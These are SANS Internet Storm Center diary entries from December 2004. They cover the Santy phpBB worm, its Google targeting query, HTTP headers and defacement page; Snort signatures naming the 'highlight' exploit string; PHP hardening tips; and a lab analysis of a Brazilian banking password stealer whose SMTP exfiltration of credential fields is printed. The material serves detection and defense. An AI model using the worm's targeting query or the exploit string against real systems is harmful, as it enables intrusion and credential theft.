We're getting reports that the DoS tool only sometimes works, and it turns
out that the vulnerability only manifests itself in verbose mode or when
using the "-A fast" output plugin; neither of which are popular or reccomended
for production use. If you're using snort this way, it is suggested that
you switch to using the unified output plugin, or simply upgrading to 2.3.0RC2;
which works pretty well. (If a sketchy DoS vulnerability isn't enough
of a carrot, they've also made some engine changes to 2.3.0RC2 to allow for
better WINS signatures and some performance enhancements.)



IRC over SMTP



A few more people have reported that they've seen IRC traffic to their SMTP
services. Keep looking!



ISC Poll Summary



Our first reader poll http://isc.sans.org/poll.php indicates that Santy.A
wasn't much of an issue for our readers. The majority of those running phpBB
had either already patched their phpBB code, or had an effective workaround
already in place. Good for you! Between effective file permissions and
the mod_security module http://www.modsecurity.org/ Santy.A was mostly harmless.
(although, some 30,000 site administrators would probably disagree with that
assessment.) Only 1% of our readers that answered the poll were compromised by
this one. Those are pretty good numbers.

* Santy Worm Update

According to http://news.zdnet.com/2100-1009_22-5500265.html Google has deactivated queries essential to Santy's propagation, which should lead to it's dying off (or by this point gone-ness). This is only a temporary fix, I would imagine, as I'm sure other queries can be crafted and the same exploit code used to relaunch this worm. Time will tell.

As a side note, we have the exploit code, so no need to send more unless you have the earlier generations that did not do defacing.

See yesterday's diary at http://isc.sans.org/diary.php?date=2004-12-21 for detailed info on what we know so far about Santy.

Snort 2.20 Denial of Service exploit posted

K-OTik notified us of this exploit for Snort 2.2 and earlier: http://www.k-otik.com/exploits/20041222.angelDust.c.php

It will core dump a running Snort process with a specially crafted packed. The recommended fix is to upgrade to Snort 2.3 RC1 or better which various handlers have reported is stable. This particular exploit works with Linux-based distributions, but not BSD-based. (We tried RHEL3, Debian, and OpenBSD).

IRC over SMTP

We have received reports of intermittent traffic of IRC commands over the SMTP protocol. Specifically, PRIVMSG commands are seen directly after the inital SMTP HELO. Almost all of the packets in this case have the string ":j1!~devel@67.15.4.95" in them. If you are also seeing this traffic, please contact us with packet dumps using the contact form.

SSH Scanning

Joel Esler put up results from a quick honeypot on what the results of a successful intrusion on the SSH scanning we've been seeing. While there are various iterations of this, all the commands in this case were in .bash_history and easily viewable. Through a couple of wget's to websites overseas IRC bncs and relays are installed on the user account. The websites were with a company that gives free webspace and e-mail making the attackers pseudo-anonymous and with the ability to simply move to another free webspace provider leading to the endless game of whack-a-kiddie we have all come to know and love.

A quick check at Yahoo! Geocities shows that this same malware that is detected by the anti-virus tools we have is easily loaded up and hosted at Geocities. I know Yahoo! for instance has the ability to virus scan attachments in e-mail. If this same functionality would be implemented at free sites to files hosted, we'd see this kind of activity decrease. It's not a complete solution, but it is certainly progress considering who easy it is to put up one of these free websites.

An InfoSec Christmas Story

On a lighter and hopefully more humorous note, I wrote a version of Twas the Night Before Christmas entitled Tw4z t3h N1t3 B3f0r3 Xm4z. If interested, you can read it here: http://decision.csl.uiuc.edu/~bambenek/tw4s.html (It's a little long for a diary).

----
John Bambenek
bambenek /at/ gmail.com

Santy worm defaces websites using phpBB bug

A worm taking advantage of a phpBB vulnerability has been defacing websites.
The worm uses the 'highlight' vulnerability found in phpBB version 2.0.10 and
earlier. It uploads and executes a perl script.

From user reports, the worm was active as early as yesterday.

ALL USERS OF PHPBB ARE URGED TO UPGRADE TO VERSION 2.0.11

The perl script first checks if it can access Google's "advanced search" page.
If it can, it will use Google to find other vulnerable sites and try to infect them. Even if it is not able to reach Google, it will try to replace all files that contain '.php', '.htm', '.asp' and '.shtm'.

As an additional feature, the script track its "generation". Each time it installs itself on a new machine, the "generation" is incremented. The defacement only takes place if the generation is larger then 3, indicating
that the script initially spread in a more stealthy mode to infect systems
silently before being discovered.

Most php installs terminate scripts that exceed a given runtime. In order to
avoid this problem, and to avoid having the script terminated once the
connection is closed, it forks itself right at the start, essentially
running in the background.

In order to verify a successful infection, the worm first attempts to create a small "marker file". If it can find this file, it will try to upload and run itself on the target system.

The URL used to search Google for vulnerable systems is:

http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&
q=allinurl%3A+%22viewtopic.php%22+%22 RANDOM1 %3d RANDOM2 %22&btnG=Search.

'RANDOM1' is one of the strings 't', 'p' or 'topic', while
'RANDOM2' is a number from 0 to 30000
A sample Google URL as it would be used by Santy:

http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&q=allinurl
%3A+%22viewtopic.php%22+%22topic%3d12345%22&btnGSearch

which results in the Google search string:

allinurl: "viewtopic.php" "topic=12345"

"viewtopic.php" is the vulnerable page in phpBB, which can be used to
trigger the 'highlight' vulnerability.
The perl script makes use of Socket.pm to setup the HTTP connections. The headers the script generates are:

GET $res HTTP/1.0

Host: $host

Accept:*/*

Accept-Language: en-us,en-gb;q=0.7,en;q=0.3

Pragma: no-cache

Cache-Control: no-cache

Referer: http://" . $host . $res . 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Connection: close

$host and $res are replaced with the hostname and URL respectively.
<P>
More details on the Sanity worm are available at:

http://www.viruslist.com/en/weblog

http://www.europe.f-secure.com/weblog/


Public exploit code for the php vulnerability has recently been made available.


If you are infected and are able to extract a copy of the perl script, please
submit it via our contact form: http://isc.sans.org/contact.php .

Preliminary Snort Signatures

here some preliminary snort signatures. Let us know if they work:

alert tcp any any -> $HOME_NET $HTTP_PORTS (msg: "phpBB highlight exploit

 attempt"; content: "&highlight=%2527%252Esystem(";) 

alert tcp any any -> any 80 (msg: "Possible Santy.A worm searching google for

 targets"; content: "&q=allinurl%3A+%22viewtopic.php%22+%22";)

A bit more then a year ago, we did discuss a web defacement against another bulletin board ("yabb") which used Google as well to find vulnerable sites. See
http://isc.sans.org/webexploit.pdf . While this wasn't a worm back then, it is another example how search engines can be used to find vulnerable sites. Also see Friday's diary about some php security tips: http://isc.sans.org/diary.php?date=2004-12-17 .

Web Server Logs

A number of users posted web server logs that show the inital check
to see if files can be written. For example, this log entry was posted
to the Unisog list:
http://lists.sans.org/pipermail/unisog/2004-December/015621.html
Defacement Message

Content of the page left by the worm:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

        <HTML><HEAD><TITLE>This site is defaced!!!</TITLE></HEAD>

        <BODY bgcolor="#000000" text="#FF0000">;

        <H1 >This site is defaced!!!</H1>;

        <HR>;

        <ADDRESS>< b>NeverEverNoSanity WebWorm generation } .

 $generation .q{.< /b

></ADDRESS>

        </BODY>

        </HTML>

('$generation' is replaced with the worm's generation count. I added spaces
to the 'H1' and 'B' tags to avoid them being parsed by the diary posting
software)

Errata

As part of our first post on this, we speculated that the worm may be using
one of the recent problems in php to spread. After getting a hold of the
code, it turned out that it is specific to phpBB and only uses the highlight
vulnerability in phpBB.
-------

isc dot chris at gee mail dot com & jullrich \'AT sans.org

phpBB Worm (added Dec 21st 12 pm EST)

We just received reports about a new worm that infects web servers running phpBB. Apparently, there is no patch at this point. However, according to viruslist.com, a workaround can be found here: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513 .

Currently, Google returns about 5.7 Million hits when searching for 'powered by phpBB'. A quick look at some of the sites matched didn't turn up any defacement so far.

According to some reports we got, patching php to the latest version (4.3.10 or 5.0.3) will fix the problem. The bug is a php bug, but phpBB makes it easy to mass-exploit this bug.

If you are infected and are able to extract a copy of the perl script, submit it via our contact form: http://isc.sans.org/contact.php .
Holiday Security Guide

If you read this diary, chances are that some piece of computer equipment is on your Santa list. So here comes a short list of things to think about (I hope its short enough so you will remember ;-) ):

Wireless Access points: Enable WEP. Yes, WEP sucks. But its better then nothing. If you can, enable 'WPA'. Make sure to use a strong passphrase either way, and turn off ESSID broadcasting. Once you got the new gadget tested and feel more comfortable with it, try and limit access to MAC addresses you own.
(brief update: As one of our readers, Chuck, pointed out, turning off the SSID can cause support issues and doesn't provide anything WEP doesn't already do. Turning off the SSID will prevent accidental connections to the AP, not determined association attempts).

New PCs: Lucky you. Got a new system waiting for you under the tree? Before connecting it to a network, make sure it is patched. If you got a system with Windows pre-installed, make sure it got Service Pack 2 and the firewall is enabled. Many systems shipped these days will allow you to install SP2 the first time you turn it on. If you are planning to give away a system, make sure to attach a Service Pack 2 CD (its ok to give away your own. MSFT's license on SP2 explicitly states that you can share the upgrade CD. NOTE: If you got a new PC with XP-SP2, you may not use the OEM version obtained with this PC to upgrade older Windows 9x PCs. You need to purchase a "boxed" version of Windows, or upgrade to another operating system)

Routers/Firewalls: Got a new firewall appliance / router? Good for you. But even security devices have to be secured. As always, apply patches. Router manufacturers regularly publish firmware upgrades. Some of which may fix security holes. Also, disable remote administration and setup a strong password. If possible, familiarize yourself with the admin interface first, before connecting the device to an outside network. This may not alway be possible. I just ran across a Netgear wireless router, which as part of its 'quick start wizard' requires an IP address at its external ("WAN") port.

VoIP: Jim mentioned VoIP yesterday. For sure, it will be a popular gift this Christmas. I tested a number of commercial VoIP providers over the last year, and non of them used any encryption. Overall, use it like e-mail. On the plus side: The provider will take care of any updates (but most of them time the updates are retrieved via TFTP, which is not exactly secure). If you are using a VoIP device over a free service like FWD, you can get a free SSL certificate for encryption from Voxilla.com ( http://voxilla.com/certrequest.php ). At this point, this service only works with Sipura devices.

Other issues you may want to consider:

* If you got better things to do over the holidays then working with your computer, shut it down. Not only will a turned off computer be more secure, but it also saves power.

* End of year is a good opportunity to do a complete backup of your system, and clean out some of the crud that accumulated.

* while you are cleaning out things, change your passwords. Not all sites expire passwords. The new year may be a good time to change things like your online banking password.

Predictions for 2005

Care to share what you think will be the big security topic in 2005? Use our
contact form ( http://isc.sans.org/contact.php ). My own favorites: VoIP, BotNet control using p2p protocols, device security ("Did you patch your toaster today?").

Top 10 signs that you are taking security too serious

Finally, don't forget to keep things in perspective ;-)

(10) you just waited in line at the post office to mail a 15 1/2 oz package instead of dropping it into the drop box.

(9) you painted your house in green/blue/yellow/orange/red.

(8) you insist on wearing safety glasses while watching IDS logs in case a packet jumps out at you.

(7) only use a C64 to browse the web and read your e-mail. No exploits since ??

(6) your password can't be cracked by a Cray supercomputer, but you need one to remember it.

(5) you bought an x-ray scanner to screen your presents for dangerous contraband.

(4) you installed a metal detector at the cat door to screen the cats as they come back from outside.

(3) your middle initial is 'D' for duct tape.

(2) C4 attached to router wired to IPS.

(1) Tin foil beany AND lead underwear.
have fun with all your new toys!

----------

Johannes Ullrich, jullrich'@';sans.org

Well, it was a very quiet Sunday. I guess all the miscreants were out Christmas shopping or something. Oh, well. That gives me opportunities for rumination (as if I needed an excuse).



Thoughts on VoIP

One of the hottest technologies out there today is voice-over-IP or VoIP. It seems like everyone is trying to get in on the act. At this point, I should probably include the disclaimer that my current employer is one of those players, though I have nothing to do with that part of the company. The idea is to use the broadband internet connections (cable or DSL) that are so prevalent today to carry telephone traffic for consumers. Now it should be noted, that a lot of voice traffic is carried over the internet already, but that isn't the point of my discussion today. VoIP has actually been around for a number of years, but only in the last year or two has the quality improved to the point where it is, in my opinion, ready for "prime time" and the evidence can be seen by the some of the major telecoms getting in on the act. Okay, I didn't join the '90s and get my own domain until 2002, but I hopped on the VoIP bandwagon this weekend. As a security guy, I'm concerned with what weaknesses are going to be found in the protocols used for VoIP and what attacks we're going to see against those adapters in the next year or two. There are already folks working on technologies to combat spam over internet telephony (SPIT). I hope they get here quickly. Some of the vendors recommend that the adapter be placed between the cable modem and the router/firewall. I assume this recommendation is for quality of service (QoS) reasons, so the adapter can give priority to voice traffic over, say, web browsing (we wouldn't want our shopping on E-bay to cause our phone conversation to break up), but the thought of any device on my connection outside my firewall makes me very uncomfortable. Fortunately, we're starting to see the adapter integrated into the router (and, in some cases, wireless access point). We'll just have to wait and see what is going to happen here. 2005 should be an interesting year.



Holiday recommended reading list

Here are a few of my favorite books if you are looking for some reading material over the holidays.



_The Tao of Network Security Monitoring_ by Richard Bejtlich

The entire _Hacking Exposed_ series. I'm just beginning what I believe is the latest in the series (at least I just noticed it), on computer forensics.

_Malware: Fighting Malicious Code_ by our own Ed Skoudis (with our own Lenny Zeltser) :)

_Know Your Enemy_ by the Honeynet Project

_Incident Response & Computer Forensics_ by Mandia, Prosise, and Pepe



Final thoughts

In my last diary entry, I asked for thoughts on conferences, books or websites that our readers liked for keeping up with current research. I only got one response on a conference and a few responses of web sites that people watch for daily news, but none that pointed me to current research, but that's okay, I continue to look. I will summarize in my next diary entry. Since this is likely my last diary entry of the year, I'll take this opportunity to wish all our readers happy holidays.



----------------------------------

Jim Clausing, jclausing at isc dot sans dot org

PHP Vulnerabilities

A number of php vulnerabilities have been released earlier this week. PHP is a
popular web scripting language, and installed by default in many linux distributions if you install Apache. Versions for Windows are available as well.

For a well written advisory, see: http://www.hardened-php.net/advisories/012004.txt">http://www.hardened-php.net/advisories/012004.txt
The quick solution is to upgrade to the latest version of php, either 4.3.10 if you are using php4 version, or 5.0.3 if you already migrated to php5. Note that the upgrades from 4.x to 5.x may break existing applications. As long as you stay with the major version (4 or 5), the upgrade shouldn't be too hard.

The popularity of PHP, and the possibility of additional bugs, bring up the questions about how to protect your PHP install. As always, if you don't need it, disable it. If you are using php as a module with Apache, look for these lines in your httpd.conf file and comment them out:

These lines will load the actual php module:

AddModule mod_php4.c

LoadModule php4_module
The next line will ask php to parse all files with the extension .php. You may find additional extensions listed:

AddType application/x-httpd-php .php
Its probably a good idea to just look for other occurrences of the string "php".

You can limit the use of php to individual virtual hosts, or reduce the list of extensions that are parsed by php to limit your exposure. PHP can also be used as a cgi script. So check your cgi-bin directories for occurrences of the php cgi binary or links to the binary.

Well, now if you need php, like we do here for all the fancy graphs and such ;-), there are a number of ways to keep php a bit more secure:

Probably the most important issue is to turn off 'register_globals'. Recent versions of php turn this parameter off by default. While this doesn't ensure proper variable validation, it encourages it.

A few other things that are a 'must do' IMHO:

(*) look at the various 'magic_quotes' parameters, and enable them as you see fit

(*) in particular if you are administering a machine that is shared by multiple users, become very familiar with 'safe_mode'. But even for a single-use system it is advisable to turn it on if possible (but it will likely break things if you haven't written your scripts to be aware of safe_mode).

(*) while we are on the topic of shared systems: Shared systems are not appropriate for anything else but "entertainment use" ;-). It is quite hard to configure them so users do not interfere with each other (in particular if a web server running needs access to various users files.

(*) review the number of modules you are using. PHP is quite modular, and you can disable various unneeded modules. For example, if you are using MySQL as a database, there is no need to risk exposures from the Sybase or Oracle modules.

(*) Think about permissions. PHP will typically run its scripts as the same user that runs apache (e.g. 'nobody' or 'apache'..). This user has to be able to read the scripts, but it doesn't have to be able to write to these files in many cases.
(*) PHP has to know about dangerous secrets like database passwords. Limit the permissions of the db accounts it uses, and keep the relevant files with passwords outside of the web servers document root.

This is about as much as I can fit into a diary. For some additional references, see the php main site, ( http://www.php.net ), the hardened php site: ( http://www.hardened-php.net ) and well, Google. Of course, don't forget to secure the OS itself.

Anyway. Like guns and fast cars, php can be a lot of fun if used responsibly and with good user input validation.
-----------

Johannes Ullrich, jullrich`AT's@ns.org

CTO SANS Internet Storm Center and Handler on Duty.

Samba vulnerability, Veritas BackupExec vulnerability, PowerPoint attachments, and some light reading.




Samba 2.x, 3.0.0 - 3.0.9 vulnerability



A vulnerability in Samba has been discovered that could allow a remote attacker
to obtain superuser access to a vulnerable Samba server. This vulnerability is
post-authentication, meaning that the attacker needs some valid login credentials
before exploitation.

Patches and a corrected release 3.0.10 are available at

http://www.samba.org/




Veritas BackupExec Agent vulnerability



A remote vulnerability in Veritas BackupExec Agent has been discovered. This vulnerability is especially serious as it does not require any authentication before the service can be exploited, and by their very nature, backup servers
tend to both be reachable by, and have access to, a large number of systems
within an organization. If you run BackupExec, patches are available for both
Version 8.6.x

http://seer.support.veritas.com/docs/273422.htm
and Version 9.1.x

http://seer.support.veritas.com/docs/273420.htm



Even if you do not run BackupExec, now would be a good time to think about the
security implications of your backup network and backup servers.



PowerPoint Attachments Considered Harmful



http://www.securityfocus.com/archive/1/384726/2004-12-13/2004-12-19/0

A recent message over on the Bugtraq mailing list brings up an interesting
idea about the malicious use of PowerPoint presentation documents and their ability to slip past most corporate email gateways. While the attack described
is hardly new, it reminds us that none of the modern helpful file formats were
designed with security in mind, and that you must always be on guard. Even if
you know the person who sent you that file in your email; if you're not already
expecting to receive it, do yourself (and others) a favor and don't open it.
To paraphrase Smokey The Bear; "Only you can prevent virus outbreaks."



In closing...


Some people have way too much free time. Several of the handlers tip their hats
to you.

< http://invisiblethings.org/papers/passive-covert-channels-linux.pdf >

New XPSP2 Firewall Patch in Windows Update

Several diary readers sent e-mail letting us know of a new (critical) patch to the XPSP2 firewall that was not mentioned in yesterday's patch release.

"After you set up Microsoft Windows Firewall in Microsoft Windows XP Service Pack 2 (SP2), you may discover that your computer can be accessed by anyone on the Internet when you use a dial-up connection to connect to the Internet."

Oops.

Details can be found at http://support.microsoft.com/kb/886185



Linux Exploits Released

We received a note today regarding public exploits released for the linux 2.4 and 2.6 kernel, igmp.c local DoS and scm_send DoS vulnerabilities discussed on Full Disclosure and Bugtraq yesterday.


F-Secure Yearly Summary (with thanks to ISC Handler Koon Yaw Tan)

F-Secure has posted a nice summary of the year as related to virus activity.

"F-Secure Corporation's Data Security Summary for 2004 - The year of phishing, professional virus-writing, and arrests" looks back on the year and offers virus statistics as well as a look back on the more memorable virus related events of 2004.

If you're so inclined, take a look at http://www.f-secure.com/2004/



ISC dot Chris /at/ gee mail dot com

Microsoft Security Bulletins

Time for new round of Microsoft Patches!




-->Microsoft Security Bulletin MS04-041


Two vulnerabilities exist in WordPad that could allow remote code
execution on an affected system. User interaction is required to
exploit these vulnerabilities.


Comments: Microsoft Rates is as Important. No problems with that one...



-->Microsoft Security Bulletin MS04-042
Two vulnerabilities exist in the DHCP Server service, of which the
most severe could allow remote code execution on an affected system.
The DHCP Server service is not installed by default. Only the DHCP
Server service on Windows NT 4.0 Server is affected.


Comments: Microsoft Rates is as Important. Disagree. Ok, it will only
affect NT 4.0, but I do believe that there is a lot of NT 4.0 running
dhcp servers on companies...



-->Microsoft Security Bulletin MS04-043
A vulnerability exists in HyperTerminal that could allow remote code
execution on an affected system. User interaction is required to
exploit this vulnerability.


Comments: Microsoft Rates is as Important. No problems with that one...



-->Microsoft Security Bulletin MS04-044
Two vulnerabilities exist in the Windows Kernel and the Local Security
Authority Subsystem Service (LSASS) that could allow privilege
elevation on an affected system. An attacker must have valid logon
credentials and be able to log on locally to exploit this
vulnerability.


Comments: Microsoft Rates is as Important. LSASS again...elevation of
privilege...No problems with that one...



-->Microsoft Security Bulletin MS04-045
Two vulnerabilities exist in Windows Internet Naming Service (WINS)
that could allow remote code execution on an affected system. The WINS
Server service is not installed by default.


Comments: Microsoft rates is as Important. This is the issue with
WINS...we are seeing some spikes on port 42 probes on our reports...remember to apply the patches...


References:

http://www.microsoft.com/technet/security/bulletin/ms04-dec.mspx

You got a Postcard!

Below is a simple malware analysis of a password stealer. This is becoming really common these days on Brazil. The miscreants are sending phishings of Brazilian Postcards websites and delivering thousands of them on users mailboxes.
This one came to mine as a warning "Your partner is cheating you, see the pictures below!"...This simple analysis was done with the free tools available for Linux and Windows.

On Linux: Strings, UPX, Unrar

On Windows: Sysinternals tool / ZoneAlarm Free




Introduction:



A suspicious file was received on Nov 30 though a spam mail with a subject of ´Your partner is cheating you - see the pictures!' (in portuguese).
Sending it to VirusTotal, showed that none of the 13 AV vendors were recognizing it as a malware.

So, I decided to analyze it to see what I could find on that one.
The purpose of this analysis is to show how you can use simple unix/linux tools to make a basic analysis.


#####################

Phase 1: The Binary

#####################<Br>
<Br>
Binary: fotos.sfx.exe

#strings -a:

-------------SNIP!------------------------<Br>
This program must be run under Win32

UPX0

UPX1

.rsrc

1.20

UPX!

W!jfVB!

-------------SNIP!------------------------<Br>

The first lines show interesting information: UPX.
UPX is a very common Packer used to compact the PE´s.
You can use UPX to pack and unpack files.


#upx -d fotos.sfx.exe -o fotos.sfx.unp.exe



#strings -a fotos.sfx.unp.exe -e -l |more


-------------SNIP!------------------------

No to A&ll

&Cancel

WinRAR self-extracting archive

-------------SNIP!------------------------


--> So, it is compressed with WinRAR
To decompress you can use Unrar:

$ unrar x -v fotos.sfx.unp.exe


-------------SNIP!------------------------

UNRAR 2.71 freeware Copyright (c) 1993-2000 Eugene Roshal





Extracting from fotos.sfx.unp.exe



Unknown method in fotos.exe

Skipping fotos.exe

No files to extract

-------------SNIP!------------------------


--> One problem...Version 2.71 does not support sfx scripts

SFX = Self eXtracting Files



So, I had to upgraded to 3.40

# ./unrar x -v ../fotos.sfx.unp.exe


-------------SNIP!------------------------

UNRAR 3.41 freeware Copyright (c) 1993-2004 Alexander Roshal





Extracting from ../fotos.sfx.unp.exe



;The comment below contains SFX script commands



Path=C:\Windows\system32

SavePath

Setup=fotos.exe

Silent=2 (Hide start dialog)

Overwrite=2 (skip existing files)





Extracting fotos.exe OK

All OK

-------------SNIP!------------------------


About the comments above, those are parameters that you set when creating RAR files with sfx.In this case:

Silent=2 means the option 'Hide start dialog'

Overwrite=2 means the option 'skip existing files'






#####################<bR>
Phase 1: Results

#####################



- There are NO pictures on that file...:)

- It is an application

- It was packed with UPX

- It was compressed with WinRar with SFX commands




#####################

Phase 2: Analysis

#####################


Strings now shows some more interesting stuff...



Network Information:


-------------SNIP!------------------------

Network unreachable.

Host unreachable.

Connection refused.

TTL expired.

Network is down.

Network is unreachable. Net dropped connection or reset.!Software caused connect
ion abort.

Connection reset by peer.

-------------SNIP!------------------------


Registry Information:


-------------SNIP!------------------------

\Software\Microsoft\Windows\CurrentVersion\Run

-------------SNIP!------------------------


-->So, looks like it will put itself at that registry key...



Application information:


-------------SNIP!------------------------

SOFTWARE\Borland\Delphi\RTL

-------------SNIP!------------------------


-->Delphi Run Time Library...a delphi application...



Mail strings:


-------------SNIP!------------------------

This is a multi-part message in MIME format

=_NextPart_2relrfksadvnqindyw3nerasdf

=_NextPart_2rfkindysadvnqw3nerasdf

Content-Type: multipart/alternative;

boundary="=_NextPart_2altrfkindysadvnqw3nerasdf"

--=_NextPart_2altrfkindysadvnqw3nerasdf

--=_NextPart_2altrfkindysadvnqw3nerasdf--

Content-Type: text/plain

Content-Transfer-Encoding: 7bit

base64

attachment

application/octet-stream

Content-Type:

-------------SNIP!------------------------


--> So, this application will send email...?



And some others strings of interest:


-------------SNIP!------------------------

=============Banco do Brasil======================
==================================================

BB Tit.=

BB Ag

nc.=<Br>
BB Cont.=

BB Senha A.=Atendimento=

BB Senha C.=

=============Banco Bradesco=======================

Bradesco Agencia=

Bradesco Conta=

Bradesco Digito=

Bradesco 4 digitos=

Bradesco Cartao=

Bradesco Resposta s.=

==============Caixa Economica=====================

Caixa Tipo=

Caixa Agencia=

Caixa Conta=

Caixa S. Intermet=

Caixa Ass. Eletronica=

=============Unibanco===========================

Unibanco 30 horas=

Unibanco Agencia=

Unibanco Conta=

Unibanco Digito=

Unibanco Senha=

Unibanco Assinatura=

Unibanco Cond. Alfanumerica=

=============Banco ITAU===========================

ITAU Conta=

ITAU Agencia=

ITAU Digito=

ITAU Senha Eletronica=

ITAU Senha do cartao=

ITAU % digitos do cartao=

ITAU Data dia=

ITAU Data mes=

ITAU Data ano=

ITAU Numero do portador=

-------------SNIP!------------------------



--> These are names of some brazilian banks. Basic portuguese: Agencia means Branch, Conta means Account and Senha means Password.


and also:


-------------SNIP!------------------------

Conta em braco!

Senha em braco!

Senha do Auto-Atendimento

-------------SNIP!------------------------


--> More portuguese lessons:

-Blank Account field!

-Blank Password field!

-ATM Password

--> and this is still funny because they wrote it wrong...the correct would be ´branco´ and not ´braco´...



And finally, some email address:

- xxxxx1@yahoo.com.br

- xxxxx2@yahoo.com.br

- xxxxx3@yahoo.com.br

- xxxxx1@bol.com.br

- xxxxx1@tugamail.com

- xxxxxx@xxxxxx

and an IP address:

- xx.xx.80.21




#####################

Phase 2: Results

#####################



- This application will try to use the network resources

- Will use something on \Software\Microsoft\Windows\CurrentVersion\Run

- Was created with Delphi

- Is related in some way to email...

- Has some string with names of Brazilian Banks and strings that asks for passwords in a format of report.

- Has a list of 7 email addresses and one IP address



Putting all together we can assume that it is one password stealer, which will send passwords to some email addresses...correct?




#####################

Phase 3: Running...

#####################



To confirm my assumptions, I decided to run this malware onto a Win2k machine. And, besides the fact that we didnt find any references of VM detection, it will be running in a real Win2k machine.


-------------SNIP!------------------------

D:\virus\fotos.sfx.unp.unr.exe>fotos.exe



D:\virus\fotos.sfx.unp.unr.exe>

-------------SNIP!------------------------




Our good friend Regmon, shows this:


-------------SNIP!------------------------

fotos.exe:1888 CreateKey HKLM\Software\Microsoft\Windows\CurrentVersion\Run SUCCESS

fotos.exe:1888 SetValue HKLM\Software\Microsoft\Windows\CurrentVersion\Run\fotos SUCCESS "D:\virus\fotos.sfx.unp.unr.exe\fotos.exe"

fotos.exe:1888 CloseKey HKLM\Software\Microsoft\Windows\CurrentVersion\Run SUCCESS

-------------SNIP!------------------------




That means that our process fotos.exe, used the method createKey() to create a new key under HKLM\Software\Microsoft\Windows\CurrentVersion\Run, also the method setValue() to create the values of the name and value of the new key, like the value "D:\virus\fotos.sfx.unp.unr.exe\fotos.exe" at HKLM\Software\Microsoft\Windows\CurrentVersion\Run\fotos


Another friend, Process Explorer, shows also good information:


-------------SNIP!------------------------

HKLM\SYSTEM\ControlSet002\Services\WinSock2\Parameters\Protocol_Catalog9

HKLM\SYSTEM\ControlSet002\Services\WinSock2\Parameters\NameSpace_Catalog5

-------------SNIP!------------------------




Winsock...interesting. We knew that this application would try to use the network resources and this confirmed...



So, lets try to browse to any of those banks websites...

Navigating to one of those bank websites using IE was kind of funny...

I dont know if it was because of the IE google bar, but The real website loaded almost perfectly, except because there was another pair of branch and account overlapping the real one...

Putting fake data on the fields or just not putting anything at all, and pressing OK, made it open another window, requesting more data, more passwords and personal information. After filling everything with some ´good data´ and pressing ok,
my ZoneAlarm came out with an alert:


-------------SNIP!------------------------

Do you want to allow fotos.exe to access the internet?


Technical Information


Destination IP: xx.xx.80.21:SMTP

Application: fotos.exe

-------------SNIP!------------------------




hummm...so that’s the why we had this IP address on that list...SMTP, email addresses...now it is starting to make sense...:)

But the xx.xx.80.21 resolves to a hosting providers...not any of the emails domains that we found...Maybe an Open relay??




#####################

Phase 3: Results

#####################



So, thats what we got so far:



- It will create a key with the name and value of HKLM\Software\Microsoft\Windows\CurrentVersion\Run\fotos , "D:\virus\fotos.sfx.unp.unr.exe\fotos.exe"

- It will use Winsock for network resources

- It will put create fake fields for passwords, account, branch and some personal information, overlapping the real fields of the bank websites

- It will try to access an smtp server at the IP that we found some steps ago...


For now on, we should think about this application much like as a Spyware. As we could notice, this application uses Winsock. There is a lot of advantages to hook itself to WinSock. In Microsoft Windows Operating Systems, Winsock is the way that it implements TCP/IP. This is wonderful of the hacker, because in this way his/hers application will be able to monitor all Internet traffic! And thats exactly what he wants! He wants to know when you will access the Banks websites!



############################

Phase 4: Final experiments

############################



So, lets setup a mail server and see what this application is trying to send to that IP.

On another machine in the same lab network, I brought up a virtual interface with the same IP address of machine that ZoneAlarm detected, and repeated the steps of phase 2, visiting the websites and filling the fake forms. After pressing the last OK, ZoneAlarm alerted me again, and this time I Allowed it to connect to the port 25 of the IP address.

My mail server made all the transaction, which was reproduced bellow with the help of another friend, Ethereal:




-------------SNIP!------------------------------------------------------<Br>
220 localhost.localdomain ESMTP Sendmail 8.12.10/8.12.10; Tue, 30 Nov 2004
17:32:53 -0200

EHLO starinfo

250-localhost.localdomain Hello starinfo [10.0.0.2], pleased to meet you

250-ENHANCEDSTATUSCODES

250-PIPELINING

250-8BITMIME

250-SIZE

250-DSN

250-ETRN

250-AUTH DIGEST-MD5 CRAM-MD5

250-DELIVERBY

250 HELP

RSET

250 2.0.0 Reset state



MAIL FROM:<xxxxxx1@bol.com.br>

250 2.1.0 <xxxxxx1@bol.com.br>... Sender ok

RCPT TO:<xxxxxx1@yahoo.com.br>

250 2.1.5 <xxxxxx1@yahoo.com.br>... Recipient ok

DATA

354 Enter mail, end with "." on a line by itself

From: xxxxxx1@bol.com.br

Subject: xxxxxx1

To: xxxxxx1@yahoo.com.br

Content-Type: text/plain

Date: Tue, 30 Nov 2004 17:33:02 -0200

X-Priority: 3

X-Library: Indy 9.00.10

=============Banco do Brasil======================
==================================================

BB Tit.= 1. Titular

BB Ag.nc.=

BB Cont.=

BB Senha A.=Atendimento=

BB Senha C.=

==================================================
=============Banco Bradesco=======================

Bradesco Agencia=

Bradesco Conta=

Bradesco Digito=

Bradesco 4 digitos=

Bradesco Cartao=

Bradesco Resposta s.=

==================================================
==============Caixa Economica=====================

Caixa Tipo= 001-Cta. Corrente - P.F.sica

Caixa Agencia=

Caixa Conta=

Caixa S. Intermet=

Caixa Ass. Eletronica=

==================================================
=============Unibanco===========================

Unibanco 30 horas=Internet 30 Horas

Unibanco Agencia=3333

Unibanco Conta=333333

Unibanco Digito=1

Unibanco Senha=1111

Unibanco Assinatura=123123123123123123123

Unibanco Cond. Alfanumerica=zaqxsw

==================================================
=============Banco ITAU===========================

ITAU Conta=

ITAU Agencia=

ITAU Digito=

ITAU Senha Eletronica=

ITAU Senha do cartao=

ITAU % digitos do cartao=

ITAU Data dia=

ITAU Data mes=

ITAU Data ano=

ITAU Numero do portador=

==================================================
=============GErenciador Financeiro===============

Gerenciador Chave=

Gerenciador Senha Acesso=

Gerenciador Senha Conta=

=================================================
============ufaaa acabo :D=======================

.

250 2.0.0 iAUJWrLK000991 Message accepted for delivery

QUIT

221 2.0.0 localhost.localdomain closing connection

-------------SNIP!--------------------------------------------------


Yep...it was sending a report with all the info gathered...

Interesting stuff...in the last line of his/hers report, it is ´ufaaa acabo´.
This means: "finally, the end"...




########################

Phase 4: Final Results

########################



- Our assumptions had been proven to be right, and this piece of malware was sending the results, through a relay, to those email addresses with all user information, as account, branch, passwords...


And finally, after sending this malware to a list of AV vendors, on the end of today, according to Virustotal, 3 AV were already detecting it!




